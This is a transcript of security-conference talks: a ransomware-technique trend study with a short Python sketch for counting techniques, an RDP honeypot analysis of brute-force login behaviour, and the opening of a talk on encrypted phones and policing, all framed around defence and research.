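# plus the extra fields mentioned (family, business model, AKAs).
from dataclasses import dataclass, field
from collections import Counter

@dataclass
class Strain:
    name: str
    year: int
    family: str                                    # "cryptoware" or "leakware"
    model: str                                     # "RaaS" or "owned"
    techniques: set = field(default_factory=set)   # MITRE technique IDs
    akas: list = field(default_factory=list)       # also-known-as names

# Hypothetical entries, only to show the shape of the database.
db = [
    Strain("SampleLocker", 2019, "cryptoware", "owned",
           {"T1566", "T1083", "T1562.001"}, akas=["SLkr"]),
    Strain("LeakyCorp", 2021, "leakware", "RaaS",
           {"T1566", "T1486", "T1082"}),
]

# With the database in place, "what hasn't changed" becomes a counting
# question: which techniques recur across strains and years?
usage = Counter(t for s in db for t in s.techniques)
print(usage.most_common(1))  # → [('T1566', 2)]  (phishing recurs in both)
```

Once every strain is a record like this, the stability question reduces to counting technique recurrence per year, which is what the rest of the talk does.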
After Nordsec I do want to go back and add a little bit more, but I also need to graduate, so we'll see how that goes. The original idea was actually a 15-year sample, and I don't think I would have survived 15 years; I didn't have enough white papers. And then I realized that I took some of your white papers, so thank you so much to everyone who wrote one. I really appreciated it. So, the fun part, the reason we're all here, right? Let's talk about some results. I want to talk briefly about initial access, because it's the entry point, and this won't come as a surprise: phishing remained the most used technique for initial access, and that was very stable across the six years I was studying. This is good news and bad news. The good news is that because it requires an interaction, from a game theory perspective it teases the idea that it can be stopped. And now, before we collectively roll our eyes because I said phishing can be stopped, and most of us know that it's not that simple: I know, I really know. The idea is that game theory teases this. I don't know how realistic it is considering how stable this has been, but we can still continue to work on it. When phishing was not an option or wasn't used, vulnerability exploitation was the second most used. It's harder to do sometimes, but it's not dependent on users' behavior, so that made it a little bit simpler sometimes. I don't want to dwell on this too much because I only have half an hour, and honestly I kind of want to geek out about other things than phishing. Not that there's anything wrong with it, it's just... it's phishing. I like funnier things. So then I started focusing more on internal discovery. When I first started gathering the data, I wasn't really doing any sort of analysis, right?
I was just gathering it up and looking at it, and what drew my attention was discovery. It probably shouldn't have surprised me as a CTI analyst, but back then I didn't know as much as I do now. There was a lot of emphasis put on discovery, internal discovery, and it made sense later on, because even though we all kind of know what's inside our infrastructure, we don't know where things are exactly. It's like if you go rob a house: you kind of know there's going to be some cash or pharmaceuticals in the bathroom, but you don't know which bathroom, and you don't know where the safe is. You have a good idea that it's probably going to be in the office, but do you really know where the office is from the outside? This was the same logic, right? And as a CTI analyst, I got asked a lot of times by clients: do you know what they took? I got ransomed, they encrypted everything, do you know what they took? My answer was always the same: whatever you're afraid they took, that's what they took. The whole point of ransomware is you have to make it hurt, right? If they didn't take what hurts the most, or what you're sometimes most ashamed of, then it wouldn't really work. My point in all of this is that you need to know what's in your infrastructure. You need to know where things are and what's valuable to you, because otherwise they will know it for you. We've seen an increase in ransomware groups tailoring their ransom demand to the victim's insurance policy, because that increases their odds of payment. So they are looking, right? But what it also told me, from a game theory perspective, is that if internal discovery is really important to them, it can also be leveraged by defenders, right? So prioritize what needs to be protected at all costs. And I know we always say you need to protect everything, but let's be realistic, no one does.
But you need to know what the goal is, the crown jewels; you need to know what they are, how to protect them, and put extra layers around those. And by the way, your employees' data falls under that category. Please, for all of the employees. So this is what you're going to want to do. The idea is that if they're taking their sweet time with internal discovery, it gives you a chance to put in a tripwire of some sort, to be able to protect yourself, or at least throw one Hail Mary to protect yourself. But I'm getting ahead of myself; I'll talk about this a little later. So these are the discovery techniques that were most used in my sample. As you can see, it's a lot of looking around for where things are, how to move around the infrastructure, and looking for documents. Basically, one of the main things I saw was that they were also looking for certain files, certain file extensions, right? They're looking for the Excel files and some Word documents. And the ones that include things like "Revenue 2022", which you know is going to be on the OneDrive somewhere and shared across multiple people: you want that, right? They're going to be looking for it. They're also going to be looking for ways to travel within your infrastructure. So, defense evasion. Okay. Defense evasion was a big thing for me, because I always thought it was the battleground of game theory, right? This is where the main interaction is, where you're testing your defense against your attack. And then, turns out, this is kind of where things went downhill for me. This is the distribution of defense evasion techniques in my sample. This sucked, because I had too many strategies that weren't recurring. When you're looking for something that isn't changing, strategies that appear once out of 116 are not good, because then you can't really draw any conclusions from them.
So when this came out the first time, honestly I thought, I'm going to have to change this project, the pentesters in my life were right, and I can't do this. But then I didn't; I kept going, and turns out I was still right. My point is, with something like this, you're kind of like: okay, so there are a lot of possible defense evasion techniques, but then why isn't there more recurrence? So I decided to do a cluster analysis. Cluster analysis is grouping a set of objects in such a way that objects in the same group are more similar to each other than to those in other groups. One of the main problems I had is that I had too many variables. The first few times I tried running this test, the software crashed twice. And then I realized the mistake: I had too many, so I had to cut down. And this is where things get tricky in research: you can't just randomly select what data you want, because that's just not fair, that's playing with the data, right? Garbage in, garbage out. So what I had to do was think about it this way: if my goal is finding out what hasn't changed, then I need to pick the top 15 strategies that were most used. And as you can see, even when I did this, the model fit is still fairly low. It's still not great, because I had too many variables. Now, I could continue to play with it, but that just wouldn't be ethical. And as much as I enjoy blurring the lines of hacking, this is not one of those times. So I got two clusters, two groups. My sample was divided in two: "I got no time to evade" at 56%, and 44% was "catch me if you can". I work full time and I do a PhD full time, so I find the fun where I can, which is naming stuff names that I probably shouldn't. So let's look at them, the main particularities of each group.
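The two-cluster split described here can be illustrated with a toy example. The thesis used proper statistical software; this hand-rolled 2-means over binary technique vectors (1 = technique observed for a strain, over a shortened "top techniques" list) is only a sketch of the idea, and the fake strain vectors are invented to mimic the two groups found.

```python
# Toy sketch of the cluster analysis: each strain is a binary vector over
# the most-used defense evasion techniques, split into k=2 groups.

def dist(a, b):
    # squared Euclidean distance between two technique vectors
    return sum((x - y) ** 2 for x, y in zip(a, b))

def two_means(vectors, iters=10):
    # naive deterministic init: start from the two most distant points
    c0, c1 = max(((a, b) for a in vectors for b in vectors),
                 key=lambda p: dist(*p))
    for _ in range(iters):
        g0 = [v for v in vectors if dist(v, c0) <= dist(v, c1)]
        g1 = [v for v in vectors if dist(v, c0) > dist(v, c1)]
        mean = lambda g: tuple(sum(col) / len(g) for col in zip(*g))
        if g0: c0 = mean(g0)
        if g1: c1 = mean(g1)
    return g0, g1

# Fake strains: most barely evade ("I got no time to evade"),
# a smaller group touches a bit of everything ("catch me if you can").
low  = [(1, 0, 0, 0, 0)] * 6
high = [(1, 1, 1, 0, 1), (0, 1, 1, 1, 1)] * 2
g0, g1 = two_means(low + high)
print(len(g0), len(g1))  # → 6 4
```

The majority group with few techniques versus a smaller busy group mirrors the 56%/44% split in the talk, though the real analysis had 15 variables and a weaker model fit.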
And what I found was pretty surprising, because I had really thought I was going to be facing groups with a lot more strategies, especially for "I got no time to evade". And this is the group at 56%, right? So it's most of my sample, well above half. And I kept thinking: why? Why would the majority of my sample be a group that hasn't done much? It got me thinking there are multiple possibilities. One of them is that my framework is not working: the techniques they're using are so new or sophisticated that MITRE didn't include them, which is a possibility. The second option is that maybe they do such a good job at internal discovery that they know in advance what to avoid and don't need to use defense evasion techniques, or they focus on what they really can. Because they took their time mapping things out and sniffing around, they didn't have to evade. The third option, and this is maybe more the CTI analyst speaking: well, in order to evade defenses, you need defenses in the first place. So maybe the victims didn't have any countermeasures in place, and therefore they didn't need to evade many defenses. The second group, the smaller one, "catch me if you can", had their hands in multiple types of strategies, a little bit everywhere, right? So for them I got the idea that they were a bit more probing, doing a little bit of everything at once. Whereas "I got no time to evade" really focused on hiding their code and their presence in their code. So I got more of a weasel type for them, because the devil is in the details, and if the defenders aren't looking in the logs for small abnormalities, they would probably miss it. So this is what I got from this. The common strategies: this is what both groups had in common, and it was a lot. They both had these strategies multiple times, at a higher rate.
And so that's why I wanted to talk about them. What I saw from this is that the core of defense evasion relied a lot on avoiding sandboxes, so sandbox evasion, and on disabling or modifying the firewall. These were defense evasions aimed directly at evading defenses. Whereas the others, even though they're considered defense evasion, were a bit more about setting yourself up for your next step, right? They're looking for ways to move around: lateral movement, persistence, and elevation of privileges. Which I thought was interesting, because when I thought of defense evasion, I really thought it was about attacking the defenses, but it turns out it was also about weaseling out of them. So, time flies when we're having fun, so I'm going to keep this short. This is where I am. I forgot to mention: two weeks ago, my partner dropped his coffee all over my laptop and I lost four months of research, so I had to restart everything in the last two weeks. This is the result of that, and it's why some of the results are not as polished as I had intended; I didn't have time to finish. So, the attacker's playbook. I know I've been quick on the results, but honestly, I can geek out about this for hours, and I'll be around today and tomorrow. If you have more thoughts or questions or anything, I'll be very happy to geek out about this more. So let's go with a short conclusion. In an ideal world, we'd focus on threat actors just not getting initial access, right? In an ideal world, we would all have such strong walls that nothing could get in. But honestly, that's just not the reality. And sure, we could increase the security around email, Teams, Slack, LinkedIn and all of this. It would help, but I don't think it would stop anything.
So I'd rather focus on limiting damage and making the job of hacking harder than it has to be, because then a lot of threat actors are just going to say: eh, whatever, I'm not wasting my time on this, right? That brings me back to discovery and defense evasion. What I learned is that the importance of discovery, even though it's logical, is something defenders could use to their advantage: threat actors may know what they want to find, but they don't know exactly where it is, right? And this is where you can mess with them. You can make that job a lot harder, longer, and with more traps. In criminology, we suspect that the longer a crime takes to be committed, the more chances there are of it being stopped, right? You have more chances of getting caught, more chances of something going wrong. So why not apply this to the discovery stage? Fool them; make traps, traps that can give you enough time to protect the jewels. I was talking to one of my favorite pentesters of all time, Adrian, who's right here today, and I was asking him about honeypots, because I know you can see honeypots from miles away. So I wanted to know: what's the alternative, the modern-day alternative? And he was talking to me about putting vulnerable switch devices in pre-selected spots in order to use them to raise an alarm that would give you enough time to protect the jewels. I listened to an episode of Darknet Diaries two days after that conversation, and that product was already out there, so I guess I was onto something. So, the limits of this research. I'm limited by what was in the white papers. If I didn't have enough information, I disregarded the strain, because I couldn't do much with it. I was limited on that side. Ransomware is customizable, and it does change depending on the target.
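The criminological intuition here, that the longer the crime takes, the more chances there are of getting caught, can be expressed as simple compounding math. This is my illustration of the argument, not a model from the thesis: assume each extra time step the attacker spends on discovery carries an independent per-step detection chance p.

```python
# If each time step has an independent detection probability p, the chance
# the attacker is caught at least once within t steps is 1 - (1 - p)^t.
# So anything that stretches out discovery (traps, decoys) compounds the
# defender's odds, even when p itself stays small.
def detection_prob(p_per_step, steps):
    return 1 - (1 - p_per_step) ** steps

# Even a 5% per-step chance compounds quickly as traps slow the attacker:
for t in (1, 10, 50):
    print(t, round(detection_prob(0.05, t), 3))
# → 1 0.05
# → 10 0.401
# → 50 0.923
```

The numbers are illustrative, but they show why slowing down internal discovery is a defensive win in itself.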
So I need to be clear that these are 116 strains that were seen at least once, but it doesn't mean that I got, say, LockBit 3's full MO, right? Because they change with their targets. So the results cannot be fully generalized, but they are telling us at least some trends that should not be ignored either. The MITRE framework is great, but when you're trying to analyze it for evolution, the newer papers included a lot of strategies that were not in the MITRE framework, which I had to add in myself, and that became kind of a problem. The next step is to continue to analyze the strategies across the years, but this time from a qualitative perspective, because statistically there wasn't that much difference and it was hard to handle. So again, the devil's in the details, right? Then I'm going to map out the strategies in a kill tree, focusing only on defense evasion. I might actually include discovery too, but I haven't talked to my supervisor about it. And the final step is, yeah, I've got to write the dissertation and defend it. So hopefully by next May I will have something done, but, you know, life. On this, I want to thank you all for coming to my talk. If you want to reach me, if you want to talk to me, I'll be around; I'm volunteering tonight and tomorrow. And this is my best friend Kevin, for those who don't like cats; I put a dog at the end to make sure you would have someone. He's living his best life in Scotland and he is thriving. I thought you would enjoy a dog at the end of this kind of grim presentation, even though there was a lot of pink. So thank you so much for your time. All right, thank you so much, Vicky. If you have any questions for Vicky, we'll be asking them afterwards. You can try to scan this beautiful QR code and write your questions. We'll review them to make sure they're acceptable; I have no doubt.
And then after that, we'll ask them during the... do you want to set up? Yeah? One moment. In fact, I have slides. Yes, but I thought we'd come back right away next time, you know. No, no, we'll be there in a minute. Oh, please don't go. Okay. All right. Okay, so we'll start with our second talk of the day, with Andréanne. Please take a seat. Andréanne has a PhD in Criminology from the University of Montreal and works as a cybersecurity researcher at GoSecure, acting as the social scientist of the team. She is interested in online attackers' behavior. She's an experienced presenter with over 38 academic conferences. Are we still at 38? 42. 42? With today, 45, I don't know. Good, I lost count. With over 45 conferences, she is now focusing on the infosec field. So if you want to know what you can infer from RDP honeypots, please stay and welcome Andréanne. Thank you, Masarah. I want to say thank you to Hugo for scheduling me in the afternoon, because this morning was hard after the party yesterday. Were you there? It was a good party. I loved it. So yeah, I'm here to talk about the extent to which humans are implicated behind automated attacks on RDP systems. I see human implication as a continuum: you can launch an automatic attack, a very basic one, or you can think more about your attack and make it a bit more sophisticated. This is the type of continuum I'm looking at, or trying to build, to understand attacker strategies better. Masarah already introduced me, so I don't have to do it all over again. I'm a cybersecurity researcher at GoSecure now, and I'm also involved in the Nordsec organization, so I swapped my red t-shirt just for this presentation and then I'll put it back on. I'm also part of the research group on open source at the University of Montreal, as scientific director. So a lot of engagement, a lot of fun. I like it.
So the objective of our research program (not just the research I'm presenting today, but all the other research I do with my colleagues) is to understand attacker strategies, to share prevention advice, and also to fight against attackers' anonymization. It's hard to really de-anonymize an attacker down to a name and an address, and we're not the police, right? It's not in our interest to do that. But we want to chip away at their anonymization, to go as far as we can in trying to identify what their strategies are and who they are. We want to scare them, so they have to change their strategies, find other ways, and work harder to attack, in order to increase their cost, right? In the attack, the calculation is benefits versus costs. So, the agenda for today: I'll explain very quickly what the Remote Desktop Protocol is, just to make sure we're on the same page. Then I'll explain the honeypot we used to collect the data, show you the data we analyzed for this research project, and show you the indicators of human behavior versus machine-like behavior, and how these, aggregated together, can result in an engagement score, a human engagement score. So first, the Remote Desktop Protocol is a Microsoft protocol allowing users to access the graphical interface of remote computers. With the shift to remote work after the pandemic, companies have relied on remote access tools to manage corporate devices and keep operations running. I'm sure a lot of you use some type of remote protocol to access your work files. And some less security-aware organizations have even exposed their RDP directly to the internet. The Cybersecurity and Infrastructure Security Agency reported an increase of 127% in RDP endpoints exposed to the internet following the pandemic. So it's a lot. And since... oops, sorry for that.
And since RDP gives users complete control over the device, well, it has been shown to be a valuable entry point for threat actors, and particularly for ransomware gangs. So you understand the urgency of understanding attackers' behavior and proposing solutions to improve protection and attack prevention. To study credential attacks on RDP, we operate (we're still operating) high-interaction honeypots on the internet. The objective of our honeypot is research; we're just collecting data for research purposes. Our specific honeypot consists of an open-source RDP interception tool called PyRDP, sitting in front of a real Windows server, so attackers can actually connect and do stuff on the honeypot. You might have seen one of the presentations of Olivier Bilodeau, who developed PyRDP with a couple of interns. I don't see any of them here, but a lot of people worked hard on the development of this tool, and maybe you have seen or listened to Purple RDP, Olivier's presentation about the tool. This is the list of all it can do; however, I will not read all that. The important thing is that it's basically a Monster-in-the-Middle which collects a lot of information. It saves basically everything. It's also an RDP visualizer, so we have access to basically everything the person who connects to our server types on their keyboard; we see where they click. It's really like a video of what they're doing once they connect. So it's highly interesting, but today I will not talk about the actual video footage. I will talk about what happens before the compromise: the credential attack before a compromise, right? So how do they compromise our RDP system? Let's start with that. And it's not with fancy backdoors and a lot of knowledge.
It's very simple brute-force attacks, which consist of just trying as many usernames and passwords as possible to try to get in, right? With all that, we collected a lot of information, a lot of login attempts. It was too much to analyze, so I took a subset of three months for today: from July 1 to September 30, all the attacks on those honeypots. The information collected before the compromise is the timestamp, the IP address, and the credentials they tried, so the username and the password. And I'm kind of excited to show you how far we can analyze the strategies with only those three pieces of information. In the dataset I'm presenting today, we have over 3.4 million login attempts. If we group them by IP, because one IP can attack us hundreds, thousands, hundreds of thousands of times, we end up with 1,529 different IP addresses in three months. A bit of descriptive information about the dataset: most attacks come from IPs registered in Asia, then Europe, then North America. We all know that's not necessarily the origin of the attacker, since they can use compromised computers or proxies or anything, but it still gives us an idea of where they're from. And I classified Russia in Asia here, which is important information because Russia is the main attacker: Russia, Panama, and China. And China is mostly Hong Kong; for those who can see, the red line represents the rest of China and the blue line is Hong Kong. So it comes from Hong Kong, right? Now, if we look at the most common usernames used in the login attempts: there are 700,000 different usernames in our dataset, but here is the top 12, okay? We see a lot of "administrator", right? And on a Windows server, the default name is administrator, so it's kind of a good strategy to try it to connect.
So if we look at all the variations of the words admin and administrator, they represent 60% of the login attempts. After that, if we look at the most common... no, it's still the most common usernames. Okay, so administrator, a lot. And then we have those three weird ones in the top 12. Their presence in the top 12 is important, because this is information about our computer: it's our RDP name, our hostname, and our certificate name, plus something related to the fact that we are on DigitalOcean. So this is information that they found and then leveraged against us to try to enter our server. There are many studies saying that brute-force attacks on RDP are very basic and use leaked lists available on the internet, and yeah, they are pretty basic, but that is not what we see here, because they use our own information against us. It's not random usernames, it's our names. Okay, now, if we look at the most common passwords in the login attempts, we still have the top 12 here. There are three important observations or trends illustrated here. First, variations of our RDP certificate are the most common strategy that we see. Then variations of the word "password", obviously, and then the use of simple strings of numbers, 10 digits or fewer. So they are either basically very bad passwords or targeted passwords. What we can conclude from that is that they basically assume people have bad passwords, which is kind of true. So yeah, we have to keep telling people to change their passwords and have strong passwords. Our job is not done on that. Here are some observations related to the credentials that I wanted to highlight. First, usernames: we can see a specialization of the username according to the country of origin of the attack. Here are two examples of those specializations.
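The descriptive counts described here are straightforward to reproduce on log rows of (IP, username, password). The rows below are made up; the point is only to show how the "share of admin variants" figure is computed.

```python
# Sketch of the username analysis: group login attempts by username and
# measure the share taken by "admin"-style variants (60% in the talk).
from collections import Counter

attempts = [  # (ip, username, password), hypothetical rows
    ("203.0.113.5", "administrator", "123456"),
    ("203.0.113.5", "Administrateur", "password1"),
    ("198.51.100.9", "admin", "P@ssw0rd"),
    ("198.51.100.9", "backup", "backup"),
    ("192.0.2.77", "ADMIN", "1234567890"),
]

usernames = Counter(u.lower() for _, u, _ in attempts)
admin_like = sum(n for u, n in usernames.items() if u.startswith("admin"))
print(admin_like / len(attempts))  # → 0.8 on this toy data
```

The same Counter pattern gives the top-12 usernames and passwords directly via `usernames.most_common(12)`.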
First, our RDP certificate name is used by China and Russia exclusively, right? So the attacks targeted using our own information come from China and Russia. This is their strategy. The username ADM is used exclusively by attackers from Nicaragua and Panama. I cannot explain that; if you have an idea, come and see me. I just thought maybe it's more common in their area to use ADM as a default user. Another observation related to credentials: the strategy of some attackers is to use thousands of different passwords, but with the same five usernames, right? 15% of attackers use this strategy. It might be a good strategy, but you have to be very confident about those five usernames. Another observation: some use the same word for the username and the password, so it's administrator/administrator. We see that a lot; it happens 21% of the time. Another observation: there are some that use the same set of credentials, the same combination, more than one time. And this I cannot understand, because it didn't work the first time, so why would it work the second time? I don't know. 26% of attackers use a combination more than one time. This tells us that maybe they are a group and they don't communicate very well with each other and they try the same list, which is not very efficient; or they are just very mixed up and don't know what they're doing, basically. So this represents maybe more basic attackers than those who target us. So I'm done with the descriptive analysis; let's dive into the research question. As I said, I perceive the attackers to be on a continuum of human engagement. There is evidence pointing toward the use of automation, so machine-like behavior, and other evidence pointing toward human behavior.
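The two credential checks just described (same word as username and password, and exact credential pairs replayed more than once) reduce to simple set and counting operations. The rows here are made up for illustration.

```python
# Sketch of two credential observations from the talk:
# 1) attempts where the username equals the password (administrator/administrator)
# 2) exact (ip, username, password) tuples replayed more than once
from collections import Counter

attempts = [  # hypothetical rows
    ("203.0.113.5", "administrator", "administrator"),
    ("203.0.113.5", "administrator", "admin123"),
    ("203.0.113.5", "administrator", "admin123"),   # replayed pair
    ("198.51.100.9", "user1", "letmein"),
]

same_word = [a for a in attempts if a[1] == a[2]]
replays = [row for row, n in Counter(attempts).items() if n > 1]
print(len(same_word), len(replays))  # → 1 1
```

Run per attacker IP instead of globally, these counts give the 21% and 26% style figures quoted in the talk.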
By human, of course there's a human at every step in all those categories, and there's also a machine in all those categories. We understand that; we just want to see how different they can be. By human involvement, I mean that they have a slightly higher level of sophistication. This is what it means, okay. So I'll show you my maps. I love my maps. It looks complicated, but I'll explain. This is an attack calendar, okay? This one is for July. You have all the days in July and all the hours of the day, okay? So this is the time pattern of attacks for one IP. Each little bar represents attacks; in this case, for this IP, the yellow one represents four attacks in this time frame, okay? Here we see a lot of attacks. This is a very good example of an automated attack that is launched, and obviously there's no human pattern or human behavior here. It's purely computer behavior, right? Because it attacks very rapidly and at all times. I can find this in my dataset, but it's not the majority of what I see, okay? I see mostly these types of patterns. So, to understand it: there's the start of the attack there, and then it stops. Yes, I was looking at the time, it makes sense. It stops, and then nothing happens. So I'm imagining that, you know, you launch a list of credentials, and then it stops, and you were not able to get in, right? And then you have to notice it, and then you have to launch another block of attacks with another list of credentials, and that would look like this, right? But you might not be in front of your computer when it ends. That's why the time between the blocks of attacks appears to be pretty random.
Because of course, and this is maybe more of a human behavior than the other example, we're not in front of the computer at all times, and we have to sleep, right? But there are other examples that are even more interesting. Well, for me; you might not be as excited as I am. Here we see two things. First, we see that they impose a delay between each attack, right? This is a strategy that is more thought out, because they are trying to imitate human behavior to avoid detection by imposing a delay between attacks. So we know that this is automated, right, because there's a delay included in the script and everything. But what is interesting is that there are days here, there's a hole in the calendar, and it falls on a weekend in July. So we can imagine, as it has been documented that China employs people on office hours to hack other countries, that this might be an example of that: they work full time during the week, then they close everything for the weekend, go home, and come back on Monday. This could be an example of that. It could also be someone who has a weekend job and does something else; we don't know yet, but these are hypotheses. And the final example I wanted to show you: the person starts attacking our honeypot on the 18th. That is not important; what I want to show you is the block of eight hours during which no attacks are started. An attack can run alone without a human in front of the computer, but there is this block of eight hours in which we do not see any attack being started. And you know, eight hours is what you need to sleep. So it might be during the night for this country. It might also be an eight-hour shift at a day job. So there are a lot of hypotheses here. I was looking at this and I was like, okay, there's something human behind it, right? There are pauses, there are weekends, there are vacation days.
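The attack calendar and the eight-hour-hole observation can be sketched with standard-library datetimes: bucket one IP's attempt timestamps into (day, hour) cells, then scan for long silent gaps. The timestamps are invented to reproduce the shape described (a morning burst, then a long pause).

```python
# Sketch of the attack-calendar analysis: bucket an IP's login-attempt
# timestamps into (day, hour) heatmap cells, then look for long gaps,
# the kind of eight-hour hole that hints at a sleeping human.
from datetime import datetime, timedelta
from collections import Counter

ts = [datetime(2023, 7, 18, h, m) for h in (1, 2, 3, 4) for m in (0, 30)]
ts += [datetime(2023, 7, 18, 14, 0), datetime(2023, 7, 18, 14, 5)]

calendar = Counter((t.day, t.hour) for t in ts)  # cells of the heatmap

ordered = sorted(ts)
gaps = [b - a for a, b in zip(ordered, ordered[1:])]
longest = max(gaps)
print(longest >= timedelta(hours=8))  # → True (a 9.5-hour silent hole)
```

The same gap scan over a three-month window, per IP, surfaces the weekend holes and nightly pauses discussed above.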
So this is why I wanted to look at the extent to which a human is present behind the screen. I identified indicators of machine-like behavior and indicators of human-like behavior. We know a machine is involved in all of these indicators, but I would say machine-like behavior is associated with a more basic attack, okay? When we see a high number of attacks, of course it's not a human trying by hand, so I associate it with machine-like behavior. When the passwords are present in popular credential lists, and for this I took RockYou 2021, with about eight billion passwords in it: if most of the passwords used by the attacker were in this list, I consider the passwords basic and part of a leaked list that is easily available on the internet. So I consider that machine-like behavior, or a less sophisticated attack. Then the constant presence of the attacker over the three-month observation period would, of course, be associated with machine-like behavior. And finally, when there are several attacks per second, it's automation, of course, so I associated it with machine-like behavior. Now, the indicators of human-like behavior, or sophistication. There's the start of attack blocks after long pauses, as I showed with the calendar; this I associate with a human. These screens are very hot, by the way; I'm burning. There's the attack being customized for its target: as I showed you, they took our information and leveraged it against us. So I said, well, this is more thought out than a basic attack, and I associated it with human-like behavior. And finally, the delay between each login. Of course this is automated, but they're trying to imitate human behavior, so I classified it as a bit more sophisticated because they thought about it. So to give a score, I added a point for each of those criteria when I saw it.
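The leaked-list criterion above can be checked mechanically: count how many of the attempted passwords appear in a popular wordlist. A sketch, using a tiny stand-in set instead of the real RockYou 2021 list, and an assumed 80% threshold of my own choosing:

```python
# Tiny stand-in for a leaked wordlist such as RockYou 2021 (~8 billion entries).
leaked = {"password", "password1", "123456", "admin", "qwerty"}

def machine_like_passwords(attempts, wordlist, threshold=0.8):
    """Flag an attack as machine-like when most of the passwords tried
    come straight from a popular leaked wordlist."""
    hits = sum(1 for p in attempts if p.lower() in wordlist)
    return hits / len(attempts) >= threshold

# 4 of these 5 attempts are in the stand-in list, so the attack is flagged.
print(machine_like_passwords(
    ["Password1", "123456", "admin", "qwerty", "NordSec!"], leaked))  # True
```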
And then I removed a point for each of the machine-like criteria. We end up with an engagement score on a continuum from machine to human. We see that there are more attackers on the human side, or the "sophisticated" side, always with quotation marks, because we could talk for a long time about sophistication and what it means, but you understand where I'm coming from with this presentation. So, a bit more on the human side. The conclusion is that we were expecting a lot of basic automation, which is what other research has found before. But that's not exactly what we saw. We saw a lot of human patterns in the attack calendars. We saw our own information leveraged against us. So we saw attacks with characteristics that are more thought out than we expected. It's a bit worrying, because if it were only the basics, it would be encouraging, but at least now we know, so we can defend against it. So, the mitigations. First, our honeypot is exposed to the internet, and you can of course use a VPN and not be exposed. This is the first thing we should tell everybody: please hide behind a VPN; we'll avoid a lot of problems that way. After that, you saw that the attacks come very fast, at all times. On new Windows 11 installs, an account lockout policy is enabled automatically, and I think this is a good idea: if I'm not mistaken, after 10 failed passwords it blocks you for 10 minutes. This is very inefficient for an attacker who attacks a lot; over the months it would take them much more time to launch as many attacks as they do. So maybe this kind of policy should be imposed on our systems a bit more. It's a good idea for now. And also, we keep saying it, I give talks about passwords and everything, and we keep repeating the same thing.
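The plus-one/minus-one scheme just described can be sketched directly. The indicator names below are my own shorthand for the criteria listed in the talk, not the labels used in the research:

```python
MACHINE_INDICATORS = {"high_attack_volume", "passwords_in_leaked_list",
                      "constant_presence", "several_attacks_per_second"}
HUMAN_INDICATORS = {"blocks_after_long_pauses", "customized_for_target",
                    "delay_between_logins"}

def engagement_score(observed):
    """+1 per human-like indicator, -1 per machine-like indicator.
    Negative scores sit at the machine end of the continuum,
    positive scores at the human/'sophisticated' end."""
    return len(observed & HUMAN_INDICATORS) - len(observed & MACHINE_INDICATORS)

# An attacker with imposed delays and paused blocks, but leaked passwords:
print(engagement_score({"delay_between_logins", "blocks_after_long_pauses",
                        "passwords_in_leaked_list"}))  # 1, leaning human
```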
Password hygiene is the best way to protect against these attacks, because as you saw, they use pretty simple passwords, variations of the word "password", and they also use our information. We can consider that personal information, and we always say: don't use personal information in your passwords. So we have to keep saying it, because it's still true. But also, keeping the default username is not a good idea, and maybe we have to repeat that too, because you need two pieces of information to get in, right? Why give one away? The username is as important as the password. So, the next steps. Do I have one minute? Yes, okay. The next step of our research: we will look at the tools that customize attacks, because we suspect this is automated; they collect our information and create their lists, possibly automatically. So we will be looking at the tools they might use to customize their attacks. After that, we want to investigate what credential lists they use, and it will be even better when we analyze the compromised sessions, because then we see all their tools and what they use. So we might be able to identify the credentials they use, since most are not from data leaks. Then we want to investigate the sharing and origin of proxies, because for this presentation I separated the IPs, but some IPs are highly related; they might use more than one IP to attack us, so we want to do that aggregation. And finally, analyze the activity after successful logins with the video footage. So, more research should be performed to reveal the precise tooling and strategies employed by opportunistic attackers. And we believe that exposing some of these groups might make them think twice about performing their opportunistic brute-forcing of RDP systems on the internet. So we want to make their life hard, basically. That's all I have for today. I'll be around if you have questions or thoughts or anything. Thank you.
Thank you, thank you. Thank you so much, Andréanne. We'll have five minutes; if you have any questions, please scan the QR code so I can ask them afterwards. And the next presentation will be in French. Okay? In French. So we're going to start the last presentation of this series, a little more connected with criminology. Today we have Professor David Décary-Hétu, a professor at the School of Criminology at the Université de Montréal, who also holds the research chair on the darknet and anonymity there. And with him is Mélanie Théoret, who is about to present. Let's give her a big round of applause, because it's her first conference presentation. Thank you for being here, and thank you for presenting. Mélanie is a student finishing her bachelor's degree in criminology at the Université de Montréal, and she did great research with David, which she's presenting with him today. So I'll leave you the stage. Thank you. Thank you, Masarah. I'm really happy to be with you this afternoon. Masarah just introduced us in a really elegant way, and I'm sorry for my voice, which is everything except elegant. I wasn't here yesterday; it's coming back slowly. And I'll take a moment, where we usually introduce ourselves and say how great we are, to invite you instead: I'm one of the co-organizers of B-16 Montreal, and our CFP is open at the moment, so if you want to submit a talk, please do. I hope we'll see you all there. Now, today, we're here to talk about encrypted phones. We've heard in recent years about the "going dark" problem: how police services supposedly have a lot of trouble investigating criminals.
And how encryption has actually changed the balance of power, if you will, between investigators and criminals. So today, what we wanted to look at is: does this problem really exist? How does it actually play out? Our presentation is divided in two parts. In the first part, Mélanie will go through a review of everything we've seen on the encrypted phones we're going to talk about. What are these devices? We don't sell encrypted phones, I have to say from the start. But we'll see how interesting these phones are for criminals and how they're also rather convenient. We'll look at how they're available, and we'll see that Canada plays a really central role in the distribution of these phones. In the second part, I'll come back, and I hope my voice lasts until then. Over the last few months we talked to several lawyers, prosecutors and police officers, and we asked them: how do you manage this encrypted phone problem? And we'll see that the point of view is very, very different depending on whether it's a defense lawyer, a prosecutor or a police officer. And we'll see, and I think it will be interesting for you too, how we can protect our phones, how we can manage it, and what the police can do if the problem ever arises and we get arrested. So that's the menu for today. And with that, I'll let Mélanie start. Thank you, David. Before starting on the subject, a little context about wiretapping and encryption. Wiretapping, as you know, is a tool that can be very useful for police officers and plays an important role in investigations. Although it is still used fairly rarely because of the costs and resources it requires, when it is used, it can bring nearly irrefutable proof.
